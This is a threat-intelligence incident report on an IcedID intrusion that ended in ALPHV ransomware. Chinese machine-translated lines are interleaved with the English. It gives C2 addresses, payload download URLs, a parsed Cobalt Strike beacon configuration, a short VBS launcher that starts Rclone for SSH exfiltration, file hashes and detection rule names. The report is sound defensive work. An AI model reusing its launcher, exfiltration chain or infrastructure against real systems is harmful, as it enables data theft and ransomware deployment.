IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

The attacker also installed Firefox to preview a few documents. This can be seen by looking at the process command line, which contains the url argument, as displayed below.
攻击者还安装了Firefox来预览一些文档。这可以通过查看包含 url 参数的进程命令行来查看,如下所示。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Command and Control

The threat actor leveraged the following methods to access the hosts within the network:

  • IcedID
  • Cobalt Strike
  • CSharp Streamer
  • ScreenConnect

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

IcedID

The forked IcedID loader established connection to command and control server modalefastnow[.]com over port 443, which resolved at the time to 212.18.104.12. The contents of the network connection matched a malware rule in the Emerging Threats Open ruleset “ET MALWARE Win32/IcedID Request Cookie”.

After the initial infection, the second stage IcedID DLL communicated with the following C2 servers:

IP Port Domain JA3 JA3s
173.255.204.62 443 jkbarmossen[.]com a0e9f5d64349fb13191bc781f81f42e1 N/A
94.232.46.27 443 evinakortu[.]com a0e9f5d64349fb13191bc781f81f42e1, 1138de370e523e824bbca92d049a3777 N/A
94.232.46.27 443 hofsaalos[.]com a0e9f5d64349fb13191bc781f81f42e1
1138de370e523e824bbca92d049a3777
N/A
77.105.140.181 443 jerryposter[.]com a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc
77.105.142.135 443 skrechelres[.]com a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc
212.18.104.12 443 modalefastnow[.]com a0e9f5d64349fb13191bc781f81f42e1 N/A

ja4: t12d190800_d83cc789557e_7af1ed941c26
ja4: t10d070700_c50f5591e341_c39ab67fec8e
ja4s: t120400_c030_12a20535f9be
ja4x: 96a6439c8f5c_96a6439c8f5c_795797892f9c

Cobalt Strike

The threat actor dropped Cobalt Strike beacons across hosts during the intrusion, communicating with the following IP addresses.

IP Port Domain JA3 JA3s AS Organization ASN Geolocation Country
85.209.11.48 80 N/A N/A N/A Chang Way Technologies Co. Limited 57523 Russia

The DFIR Threat intelligence feeds tracked this infrastructure as a live Cobalt Strike server starting 2023-09-29 through 2023-10-30.

The following URIs were accessed for 85.209.11.48:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Using MemProcFS to process the memory from the backup server, we were able to extract the minidump for the injected Cobalt Strike process. Using the minidump, the beacon configuration was able to be parsed using 1768.py:

File: minidump.dmp
Config found: xorkey b'.' 0x00000000 0x00010000
0x0001 payload type                     0x0001 0x0002 0 windows-beacon_http-reverse_http
0x0002 port                             0x0001 0x0002 80
0x0003 sleeptime                        0x0002 0x0004 60000
0x0004 maxgetsize                       0x0002 0x0004 1048576
0x0005 jitter                           0x0001 0x0002 0
0x0007 publickey                        0x0003 0x0100 30819f300d06092a864886f70d010101050003818d0030818902818100a70991d69d816a601ffa80976473830f0d3b41276d2790401ddedb18e2d3cab3c315e3222325be42b65adb2878f33f5a03ff5010b23e842a510c1482ad6a42f1e7e5726eb31813e7437640ed7879955f401e172c34d3517241596dd41f8e48d3d1b1c288e6c8752ff65dc27acccba4ba9cd6d0e4de6196cea4da480d3b99d0ed020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Has known private key
0x0008 server,get-uri                   0x0003 0x0100 '85.209.11.48,/load'
0x0043 DNS_STRATEGY                     0x0001 0x0002 0
0x0044 DNS_STRATEGY_ROTATE_SECONDS      0x0002 0x0004 -1
0x0045 DNS_STRATEGY_FAIL_X              0x0002 0x0004 -1
0x0046 DNS_STRATEGY_FAIL_SECONDS        0x0002 0x0004 -1
0x000e SpawnTo                          0x0003 0x0010 (NULL ...)
0x001d spawnto_x86                      0x0003 0x0040 '%windir%\\syswow64\\rundll32.exe'
0x001e spawnto_x64                      0x0003 0x0040 '%windir%\\sysnative\\rundll32.exe'
0x001f CryptoScheme                     0x0001 0x0002 0
0x001a get-verb                         0x0003 0x0010 'GET'
0x001b post-verb                        0x0003 0x0010 'POST'
0x001c HttpPostChunk                    0x0002 0x0004 0
0x0025 license-id                       0x0002 0x0004 1580103824 Stats uniques -> ips/hostnames: 210 publickeys: 92
0x0026 bStageCleanup                    0x0001 0x0002 0
0x0027 bCFGCaution                      0x0001 0x0002 0
0x0009 useragent                        0x0003 0x0100 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUS)'
0x000a post-uri                         0x0003 0x0040 '/submit.php'
0x000b Malleable_C2_Instructions        0x0003 0x0100
  Transform Input: [7:Input,4]
   Print
0x000c http_get_header                  0x0003 0x0200
  Build Metadata: [7:Metadata,3,6:Cookie]
   BASE64
   Header Cookie
0x000d http_post_header                 0x0003 0x0200
  Const_header Content-Type: application/octet-stream
  Build SessionId: [7:SessionId,5:id]
   Parameter id
  Build Output: [7:Output,4]
   Print
0x0036 HostHeader                       0x0003 0x0080 (NULL ...)
0x0032 UsesCookies                      0x0001 0x0002 1
0x0023 proxy_type                       0x0001 0x0002 2 IE settings
0x003a TCP_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'
0x0039 SMB_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'
0x0037 EXIT_FUNK                        0x0001 0x0002 1
0x0028 killdate                         0x0002 0x0004 0
0x0029 textSectionEnd                   0x0002 0x0004 0
0x002b process-inject-start-rwx         0x0001 0x0002 64 PAGE_EXECUTE_READWRITE
0x002c process-inject-use-rwx           0x0001 0x0002 64 PAGE_EXECUTE_READWRITE
0x002d process-inject-min_alloc         0x0002 0x0004 0
0x002e process-inject-transform-x86     0x0003 0x0100 (NULL ...)
0x002f process-inject-transform-x64     0x0003 0x0100 (NULL ...)
0x0035 process-inject-stub              0x0003 0x0010 '"+\x8f\'Ûߺ\x8dÝU\x9eì¢~¦H'
0x0033 process-inject-execute           0x0003 0x0080 '\x01\x02\x03\x04'
0x0034 process-inject-allocation-method 0x0001 0x0002 0
0x0000
Guessing Cobalt Strike version: 4.3 (max 0x0046)
Sanity check Cobalt Strike config: OK
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x005e2f3f
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x00624b3f

CSharp Streamer CSharp 主播

The “cslite.exe” CSharp Streamer executable communicated to the IP address 109.236.80.191. During the intrusion, we observed traffic to it across various ports, including 135, 139, 80, 443, and 3389. Most traffic was observed at 443 and 3389. Looking at the memory of the “cslite.exe” run in a sandbox, we can extract the configured communication preferences for the trojan:
“cslite.exe”CSharp Streamer 可执行文件与 IP 地址 109.236.80.191 通信。在入侵期间,我们观察到了跨各个端口的流量,包括 135、139、80、443 和 3389。在443和3389处观察到的交通量最多。查看沙箱中运行的“cslite.exe”的内存,我们可以提取木马配置的通信首选项:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

The malware uses WebSockets for communication, as observed with the wss:// in the URL. We also see that the communication was setup to use socket.io, to proxy the communication. And if the malware cannot reach a specific port, it rotates through a list of various ports, likely to both evade ports blocked in the victim firewall and help obfuscate communication by changing the port in use throughout an intrusion.

IP Port Domain Ja3 Ja3s AS Organization ASN Geolocation Country
109.236.80.191 443 www.i2rtqyj[.]ekz c12f54a3f91dc7bafd92cb59fe009a35 394441ab65754e2207b1e1b457b3641d WorldStream B.V. 49981 Netherlands

ja4: t12i210600_76e208dd3e22_2dae41c691ec
ja4s: t120200_c02f_ec53b3cc8a64
ja4s: t120400_c02f_12a20535f9be
ja4x: bbd6cc0fca29_4ce939b68fae_79faaa53868b

During the intrusion, we observed several Zeek notice messages alerting on the self-signed certificate used by the CSharp Streamer command and control server.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

ScreenConnect

Post the initial forked IcedID loader infection, the threat actor deployed ScreenConnect on the beachhead using a renamed binary “toovey.exe”. Later, ScreenConnect was installed on multiple systems by dropping renamed installer and executing it through Impacket’s wmiexec.py script.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Exfiltration

While Firefox was used to preview documents, it was also used to download Rclone. When the process command line is not available, defenders can look for web history artifacts. In Firefox, web history artifacts are well documented and can be directly looked at using an SQLite browser.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Rclone was dropped on the file server. This can be detected by looking at file creation, for instance using the event ID 11 from Sysmon.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Rclone was not directly started, but was launched though a VBS script named nocmd.vbs, which itself executes rcl.bat, which in turn executes Rclone.
Rclone 不是直接启动的,而是通过一个名为 nocmd.vbs 的 VBS 脚本启动的,该脚本本身执行 rcl.bat,而 又执行 Rclone。

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "c:\programdata\rcl.bat" & Chr(34), 0
Set WshShell = Nothing

Before that, the threat actor used the config Rclone command, which performs the following action according to the documentation:
在此之前,威胁参与者使用了 config Rclone 命令,该命令根据文档执行以下操作:

enter an interactive configuration session where you can setup new remotes and manage existing ones
进入交互式配置会话,您可以在其中设置新的遥控器并管理现有遥控器

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Upon execution, network artifacts show an increase in egress traffic to the exfiltration server on port 22 (SSH). Increase of egress traffic, especially to previously unknown hosts or suspicious ports can be used to detect early exfiltration attempts. Indeed, below is presented a chart of traffic to port 22 during the whole course of this intrusion.
执行时,网络项目显示端口 22 (SSH) 上流出服务器的出口流量增加。出口流量的增加,尤其是以前未知的主机或可疑端口的出口流量的增加,可用于检测早期外泄尝试。事实上,下面显示了在整个入侵过程中到端口 22 的流量图表。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Exfiltration Server data:
外泄服务器数据:

IP Port 港口 Domain  AS Organization AS组织 ASN Geolocation Country 地理位置国家/地区
217.23.12.8 22 N/A WorldStream B.V. WorldStream B.V.公司 49981 Netherlands 荷兰

Impact 冲击

On the eighth day of the intrusion, the threat actor moved toward their final objective, deploying ALPHV Ransomware. This started with the threat actor staging two files on the backup server.
在入侵的第八天,威胁行为者朝着他们的最终目标前进,部署了 ALPHV 勒索软件。这始于威胁参与者在备份服务器上暂存两个文件。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

“setup.exe,” which was dropped twice, was just the latest ScreenConnect installer the adversary employed during the intrusion. “BNUfUOmFT2.exe” was the ransomware binary.
“setup.exe”被丢弃了两次,只是对手在入侵期间使用的最新 ScreenConnect 安装程序。“BNUfUOmFT2.exe”是勒索软件二进制文件。

First, they used the xcopy Windows utility to move the ScreenConnect installer across the domain in the root of C$:
首先,他们使用 xcopy Windows 实用程序在 C$ 根目录中的域中移动 ScreenConnect 安装程序:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Second, they remotely ran the installer on hosts using WMI commands:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Third, they repeated the process, copying the ransomware payload from the backup server to the domain joined hosts in the network.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Finally, they used this same method to execute the ransomware remotely via WMI:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

On the remote hosts, the “WMIPrvSE.exe” was observed executing the task.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

During the ransomware deployment phase, we observed the threat actor deleting all the backups interactively.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

After completing the encryption of files, the following note was left on the infected hosts with the call out to review Twitter to associate the group:
完成文件加密后,在受感染的主机上留下了以下注释,并呼吁查看 Twitter 以关联该组:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Timeline 时间线

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Diamond Model

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Indicators

Atomic

CobaltStrike
85.209.11[.]48 

CSharp Streamer
109.236.80[.]191 

Data exfiltration
217.23.12[.]8 

Forked IcedID Loader
212.18.104[.]12 / modalefastnow[.]com

2nd Stage IcedID payload
92.118.112[.]113 / hofsaalos[.]com
173.255.204[.]62 / jkbarmossen[.]com
94.232.46[.]27 / evinakortu[.]com
77.105.140[.]181 / jerryposter[.]com
77.105.142[.]135 / skrechelres[.]com

URLs
http[:]//85.209.11[.]48:80/download/test1.exe 
http[:]//85.209.11[.]48:80/download/http64.exe
http[:]//85.209.11[.]48:80/download/csss.exe 
http[:]//85.209.11[.]48:80/ksajSk
http[:]//85.209.11[.]48:80/ksaid
http[:]//temp[.]sh/VSlAV/http64.exe

Computed

 cscs.exe
	 99d8c3e7806d71a2b6b28be525c8e10e
	 59791ec1c857d714f9b4ad6c15a78191206a7343
	 5d1817065266822df9fa6e8c5589534e031bb6a02493007f88d51a9cfb92e89b 

cscss.exe
	 08fcf90499526a0a41797f8fdd67d107
	 7d130ace197f4148932306facfc8d71fa8738d86
	 c2ddb954877dcfbb62fd615a102ce5fa69f4525abc1884e8fe65b0c2b120cfd4
		  
cscssss.exe
	 26239fa16d0350b2224bfb07e37cbd84
	 8837ad1bafb56019a46822da0ed8b468f380c80d
	 7d2e705dcaa9f36fb132b7ff329f61dd5d0393c28dcd53b2be1e3ba85c633360
 
 ccs.exe
	2b1b2b271bc78e67beca2dcd04354189
	c83da151f26a58aecb24fc6ba4945acb934ee954
    bd4876f7efbd18a03bbb401a5dc77ed68ef95c72a3f7be83cef39a4515e0c476

rclone.exe
	581cfc2d4e02a16b9b2f8dcb70a46b8b
	1d345799307c9436698245e7383914b3a187f1ec
	9c5b233efb2e2a92a65b5ee31787281dd043a342c80c7ac567ccf43be2f2843f

BNUfUOmFT2.exe
	7ff0241b28d766198743d661a2f67620
	27acb306baec022a974db50a90f48183541e12fe
	94d6395dcab01250650e884f591956464d582a4f1f5da948055e6d2f0a215ace

confucius_cpp.exe
	fb34b1fb80b053e69d89af5330cd7d4b
	e97b00ef58fe081170137536f28df590dbb41a0e
	dfa8c282178a509346fb0154e6dbd5fbb0b56c38894ce7d244f5ca26d6820e67

cslite.exe
	642bf60f06bb043c4a74d0501597cf5e
	e1bc0c7cf030af31522c1160e0c70df5cecbb64a
	4103cc8017409963b417c87259af2a955653567cdbf7d5504198dd350f9ef9c1

https64.dll
	5548caa3b8cdd73b3a56f3f102942882
	e43ecd2f6859e4769028fbd7176bb3339393ea22
	d8f51dcfe928a1674e8d88029a404005ab826527372422cac24c81467440feb0

http64.dll
	0decfd5e200803523c0437ff7aac7349
	be8fd3c3507f02785da6f12c9b21ff73638cdf23
	cd0e941587672ab1517681a7e3b4f93a00020f8c8c8479a76b9e3555bcd04121

ccslt.exe
	5cbb08cd26162e8046df17d15ba6e907
	41f47f8ee34c9ae7a4bb43b71e3cc85266302e8e
	6a6cd64fba34aadad2df808b0fcab89ef26a897040268b24fed694036cc51d6a 

iwiqocacod.dll
	efb019b1999d478a4161a030a5d9302e
	514ddcf981d7d8684b3ac20e902f5017292d51c5
	bc49622009b29c23ee762fe6f000936eb1c4c1b29496d5382f175c99ad941aac

JNOV0135_7747811.zip
	24701208c439b00a43908ae39bbf7de8
	25ef7044cdf9b7c17253625a2bd5d2d6fee44227
	3336bfde9b6b8ef05f1d704d247a1a8fd0641afaecc6a71f5cfa861234c4317b

[2023.10.11_08-07].vbs
	4ff5625e6bd063811ec393b315d2c714
	42b188e2e015a72accc50fcbde2d2c81f5258d0b
	5bab2bc0843f9d5124b39f80e12ad6d1f02416b0340d7cfec8cf7b14cd4385bf

0370-1.dll
	bf15a998fd84bee284ae9f7422bda640
	e51217efb6e33fca9f7c5f51e5c3a4ae50499a37
	fab34d1f0f906f64f95b9f244ae1fe090427e606a9c808c720e18e93a08ed84d

netscan.exe
	a768244ca664349a6d1af84a712083c0
	39300863bcaad71e5d4efc9a1cae118440aa778f
	e14ba0fb92e16bb7db3b1efac4b13aee178542c6994543e7535d8efaa589870c

nocmd.vbs
	d28271ed838464d1debab434ef6d8e37
	2741c136b92aca1e890d2b67084c6867d3cbaa87
	457a2f29d395c04a6ad6012fab4d30e04d99d7fc8640a9ee92e314185cc741d3

rcl.bat
	00c3f790f6e329530a6473882007c3e5
	b02db8c2b9614e986e58f6e31be686b418f9aba7
	6f3a02674b6bbf05af8a90077da6e496cc47dda9101493b8103f0f2b4e4fd958

Detections 检测

Network 网络

ET INFO Executable Download from dotted-quad Host
ETPRO HUNTING Windows BITS UA Retrieving EXE
ET HUNTING Suspicious BITS EXE DL From Dotted Quad
ET POLICY PE EXE or DLL Windows file download HTTP
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
ETPRO HUNTING Windows BITS UA Retrieving EXE M2
ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request
ETPRO MALWARE Likely Evil Certutil Retrieving EXE
ThreatFox payload delivery (domain - confidence level: 100%)
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
ThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 80%)
ET INFO Packed Executable Download
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
ET MALWARE Cobalt Strike Beacon Observed
ET MALWARE Win32/IcedID Requesting Encoded Binary M4
ET MALWARE Win32/IcedID Request Cookie
ET SCAN Potential SSH Scan OUTBOUND 

Sigma 西格马

Search rules on detection.fyi or sigmasearchengine.com
在 detection.fyi 或 sigmasearchengine.com 上的搜索规则

DFIR Report Public Repo:
DFIR报告公开回购:

8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration Write Access Check
dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup

DFIR Report Private Repo:
DFIR 报告私有回购:

7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee: Use of Rclone to exfiltrate data over an SSH channel
a09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse for Malicious File Download
6f77de5c-27af-435b-b530-e2d07b77a980: Impacket Tool Execution
6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer RAT loading binary from APPDATA
879ddba7-5cb9-484f-88a4-c1d87034166f: Suspicious ScreenConnect Script Execution

Sigma Repo:

90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download From Direct IP
10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential Impacket Lateral Movement Activity
b1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool - ScreenConnect Remote Command Execution
90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From GUID Like Folder Names
19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via Certutil.EXE
d059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin
e37db05d-d1f9-49c8-b464-cee1a4b11638: PUA - Rclone Execution
7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via CHCP
d5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe
c8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User Agent
1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest Execution With DirectIP
0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of Systeminfo
903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution
5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via Nltest.EXE
624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution Patterns

Yara 雅苒

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/24952/24952.yar

MITRE ATT&CK

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

LSASS Memory - T1003.001
DCSync - T1003.006
System Network Configuration Discovery - T1016
Remote System Discovery - T1018
Automated Exfiltration - T1020
Remote Desktop Protocol - T1021.001
System Owner/User Discovery - T1033
Data from Network Shared Drive - T1039
Commonly Used Port - T1043
Scheduled Task - T1053.005
PowerShell - T1059.001
Windows Command Shell - T1059.003
Visual Basic - T1059.005
Domain Groups - T1069.002
Web Protocols - T1071.001
Domain Accounts - T1078.002
System Information Discovery - T1082
File and Directory Discovery - T1083
Local Account - T1087.001
Domain Account - T1087.002
Network Share Discovery - T1135
BITS Jobs - T1197
Malicious File - T1204.002
Data from Information Repositories - T1213
Regsvr32 - T1218.010
Rundll32 - T1218.011
Remote Access Software - T1219
Domain Trust Discovery - T1482
Data Encrypted for Impact - T1486
Archive via Utility - T1560.001
Phishing - T1566
Service Execution - T1569.002
System Language Discovery - T1614.001
Indicator Removal: File Deletion - T1070.004

原文始发于thedfirreport:IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

版权声明:admin 发表于 2024年6月11日 上午9:33。
转载请注明:IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment | CTF导航

相关文章